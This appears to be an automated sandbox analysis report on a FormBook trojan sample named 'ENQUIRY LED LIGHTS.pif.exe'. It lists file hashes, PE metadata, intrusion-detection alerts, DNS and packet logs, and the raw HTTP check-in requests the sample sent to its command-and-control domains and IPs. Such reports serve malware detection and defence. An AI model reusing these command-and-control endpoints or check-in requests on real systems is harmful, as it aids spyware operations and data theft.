                                                                                        http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/css/shortcodesSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.apache.org/licenses/LICENSE-2.0ENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.fontbureau.comENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_shop.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.windowmart.onlinebdtKgWWjtPR.exe, 00000009.00000002.2977288553.00000000026D3000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/woocommerce-shipping-progress-bar/shippinSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://api.w.org/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.waidzeitcz.shop/my-account/bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
IP               Domain                    Country        ASN    ASN Name           Malicious
75.2.103.23      www.asklifeclarity.shop   United States  16509  AMAZON-02US        true
162.0.231.203    www.windowmart.online     Canada         22612  NAMECHEAP-NETUS    true
172.67.163.171   www.waidzeitcz.shop       United States  13335  CLOUDFLARENETUS    true
3.33.130.190     ontoweightloss.health     United States  8987   AMAZONEXPANSIONGB  true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1550102
Start date and time: 2024-11-06 13:40:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ENQUIRY LED LIGHTS.pif.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@6/4
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 117
• Number of non-executed functions: 317
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target bdtKgWWjtPR.exe, PID 4432 because it is empty
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: ENQUIRY LED LIGHTS.pif.exe
Time      Type             Description
07:41:01  API Interceptor  3x Sleep call for process: ENQUIRY LED LIGHTS.pif.exe modified
07:42:28  API Interceptor  593780x Sleep call for process: SearchFilterHost.exe modified
                                                                                                • 162.0.238.246
                                                                                                AMAZONEXPANSIONGBhttps://rebrand.ly/32mqjh6Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 3.33.143.57
                                                                                                Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                PO_11000262.vbsGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                Follow up - DoorDash Corporate Platform.msgGet hashmaliciousUnknownBrowse
                                                                                                • 3.33.169.150
                                                                                                https://averellharriman.sharefile.com/public/share/web-sab7e0a816d3e4e0ca3a0899254901a6dGet hashmaliciousUnknownBrowse
                                                                                                • 3.33.222.159
                                                                                                https://averellharriman.sharefile.com/public/share/web-s3b96c17360cd43e7bdcaf25a23709fd0Get hashmaliciousUnknownBrowse
                                                                                                • 3.33.222.159
                                                                                                Adobeflash.msiGet hashmaliciousAteraAgentBrowse
                                                                                                • 52.223.39.232
                                                                                                IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                                                • 3.33.130.190
                                                                                                No context
                                                                                                No context
                                                                                                Process:C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.34331486778365
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                Process:C:\Windows\SysWOW64\SearchFilterHost.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.634028410443898
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:ENQUIRY LED LIGHTS.pif.exe
                                                                                                File size:1'024'512 bytes
                                                                                                MD5:120c54a53b6678586cc21f6eefb3c3a5
                                                                                                SHA1:52b149e7d7bfd16ef2b108e4ef4d8c6cd28cfab5
                                                                                                SHA256:8311884c536e402615c44c0010553cb85718a79a82fa59f90bbdc79321cc60c5
                                                                                                SHA512:a6c6f11321b3a6510a31d810bd78a773f903c4f5692da6f0036298e60430bc63bf7f387884002d6d41adb4a6408b9c287bedc20c801a708949930ff22d91d12c
                                                                                                SSDEEP:24576:Fc2t5szG62Qtv2utcLTICo9rzOwbEqZX:Fc23yGStv2utcLTq9rzOwwq
                                                                                                TLSH:EC25BED03665AB19DE6D4BB8C059DC3483B81D64B005FBAE5ED877DB38B9320A908F47
                                                                                                Icon Hash:1365d6b2924c718f
                                                                                                Entrypoint:0x4f6fb6
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x672B4D9A [Wed Nov 6 11:06:02 2024 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf6f64 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf8000 | 0x4ce4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xf4ffc | 0xf5000 | 1fd75997040d2026cd90856d4c5229f0 | False | 0.8158452248086735 | OpenPGP Public Key | 7.630840846842573 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xf8000 | 0x4ce4 | 0x4e00 | c328234dd64fae2a1a1127a9c89e7a20 | False | 0.9481670673076923 | data | 7.832056499096397 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xfe000 | 0xc | 0x200 | 275eac16c9b1e10727dcf51df382541d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xf80c8 | 0x48cd | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.991039330364329
RT_GROUP_ICON | 0xfc9a8 | 0x14 | data | | | 1.05
RT_VERSION | 0xfc9cc | 0x314 | data | | | 0.41751269035532995
DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-06T13:41:20.543853+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 52.149.20.212 | 443 | 192.168.2.4 | 49735 | TCP
2024-11-06T13:41:42.019215+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 51155 | TCP
2024-11-06T13:41:43.858729+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 172.202.163.200 | 443 | 192.168.2.4 | 51156 | TCP
2024-11-06T13:42:07.383224+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 51201 | 3.33.130.190 | 80 | TCP
2024-11-06T13:42:07.383224+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 51201 | 3.33.130.190 | 80 | TCP
2024-11-06T13:42:28.498327+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51315 | 75.2.103.23 | 80 | TCP
2024-11-06T13:42:31.003463+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51329 | 75.2.103.23 | 80 | TCP
2024-11-06T13:42:33.735051+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51345 | 75.2.103.23 | 80 | TCP
2024-11-06T13:42:36.169295+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 51358 | 75.2.103.23 | 80 | TCP
2024-11-06T13:42:36.169295+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 51358 | 75.2.103.23 | 80 | TCP
2024-11-06T13:42:50.990838+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51427 | 172.67.163.171 | 80 | TCP
2024-11-06T13:42:53.615741+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51428 | 172.67.163.171 | 80 | TCP
2024-11-06T13:42:56.271768+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51429 | 172.67.163.171 | 80 | TCP
2024-11-06T13:42:59.693800+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 51430 | 172.67.163.171 | 80 | TCP
2024-11-06T13:42:59.693800+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 51430 | 172.67.163.171 | 80 | TCP
2024-11-06T13:43:06.146500+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51431 | 162.0.231.203 | 80 | TCP
2024-11-06T13:43:08.752984+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51432 | 162.0.231.203 | 80 | TCP
2024-11-06T13:43:11.920944+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 51433 | 162.0.231.203 | 80 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                Nov 6, 2024 13:43:00.162128925 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162142992 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162151098 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162151098 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162197113 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162702084 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162744999 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.162779093 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162791967 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.162837982 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.209059000 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209162951 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209176064 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209239960 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.209507942 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209520102 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209697962 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.209794998 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209806919 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.209832907 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.254642010 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.278736115 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.278778076 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.278872013 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.278935909 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.278992891 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279005051 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279043913 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.279200077 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279305935 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.279347897 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.279448986 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:00.281451941 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.301862955 CET5143080192.168.2.4172.67.163.171
                                                                                                Nov 6, 2024 13:43:00.306797981 CET8051430172.67.163.171192.168.2.4
                                                                                                Nov 6, 2024 13:43:05.400810003 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:05.405740976 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:05.406591892 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:05.430457115 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:05.435494900 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:06.089951038 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:06.146500111 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:06.149688005 CET8051431162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:06.150583982 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:06.984353065 CET5143180192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.017476082 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.022528887 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.026804924 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.050035000 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:08.055346012 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.713653088 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.752928972 CET8051432162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:08.752984047 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:10.146991014 CET5143280192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.183527946 CET5143380192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.188879013 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.188975096 CET5143380192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.213046074 CET5143380192.168.2.4162.0.231.203
                                                                                                Nov 6, 2024 13:43:11.218175888 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218193054 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218198061 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218216896 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218221903 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218230963 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218235970 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218269110 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.218272924 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.881344080 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.920840979 CET8051433162.0.231.203192.168.2.4
                                                                                                Nov 6, 2024 13:43:11.920943975 CET5143380192.168.2.4162.0.231.203
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 6, 2024 13:41:37.187922955 CET | 192.168.2.4 | 1.1.1.1 | 0x6b7d | Standard query (0) | 15.164.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Nov 6, 2024 13:42:06.699683905 CET | 192.168.2.4 | 1.1.1.1 | 0xc24 | Standard query (0) | www.ontoweightloss.health | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:27.502720118 CET | 192.168.2.4 | 1.1.1.1 | 0xdcca | Standard query (0) | www.asklifeclarity.shop | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:41.220483065 CET | 192.168.2.4 | 1.1.1.1 | 0x472b | Standard query (0) | www.worldoffun.online | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:49.422851086 CET | 192.168.2.4 | 1.1.1.1 | 0xed24 | Standard query (0) | www.waidzeitcz.shop | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:43:05.346530914 CET | 192.168.2.4 | 1.1.1.1 | 0xfa44 | Standard query (0) | www.windowmart.online | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 6, 2024 13:41:37.197549105 CET | 1.1.1.1 | 192.168.2.4 | 0x6b7d | Name error (3) | 15.164.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Nov 6, 2024 13:42:06.713854074 CET | 1.1.1.1 | 192.168.2.4 | 0xc24 | No error (0) | www.ontoweightloss.health | ontoweightloss.health | | CNAME (Canonical name) | IN (0x0001) | false
Nov 6, 2024 13:42:06.713854074 CET | 1.1.1.1 | 192.168.2.4 | 0xc24 | No error (0) | ontoweightloss.health | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:06.713854074 CET | 1.1.1.1 | 192.168.2.4 | 0xc24 | No error (0) | ontoweightloss.health | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:27.787374020 CET | 1.1.1.1 | 192.168.2.4 | 0xdcca | No error (0) | www.asklifeclarity.shop | | 75.2.103.23 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:41.333054066 CET | 1.1.1.1 | 192.168.2.4 | 0x472b | Server failure (2) | www.worldoffun.online | none | none | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:49.438245058 CET | 1.1.1.1 | 192.168.2.4 | 0xed24 | No error (0) | www.waidzeitcz.shop | | 172.67.163.171 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:42:49.438245058 CET | 1.1.1.1 | 192.168.2.4 | 0xed24 | No error (0) | www.waidzeitcz.shop | | 104.21.49.146 | A (IP address) | IN (0x0001) | false
Nov 6, 2024 13:43:05.387350082 CET | 1.1.1.1 | 192.168.2.4 | 0xfa44 | No error (0) | www.windowmart.online | | 162.0.231.203 | A (IP address) | IN (0x0001) | false
                                                                                                • www.ontoweightloss.health
                                                                                                • www.asklifeclarity.shop
                                                                                                • www.waidzeitcz.shop
                                                                                                • www.windowmart.online
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 51201 | 3.33.130.190 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 13:42:06.775727987 CET | 509 | OUT | GET /3wgj/?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg HTTP/1.1
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en
                                                                                                Host: www.ontoweightloss.health
                                                                                                Connection: close
                                                                                                User-Agent: UCWEB/2.0(BlackBerry; U; 5.1.0.532; en-us; 9900/5.1.0.532) U2/1.0.0 UCBrowser/8.1.0.216 U2/1.0.0 Mobile
Nov 6, 2024 13:42:07.382656097 CET | 399 | IN | HTTP/1.1 200 OK
                                                                                                Server: openresty
                                                                                                Date: Wed, 06 Nov 2024 12:42:07 GMT
                                                                                                Content-Type: text/html
                                                                                                Content-Length: 259
                                                                                                Connection: close
                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 51315 | 75.2.103.23 | 80 | 2332 | C:\Program Files (x86)\GLdnWYJPaUOjtUHzYldWzGfpjLtlnqJdruOyhkndGIdQiLYJLYRKVXzXFidAROCpYnmkcwS\bdtKgWWjtPR.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 13:42:27.826230049 CET | 784 | OUT | POST /b5w1/ HTTP/1.1
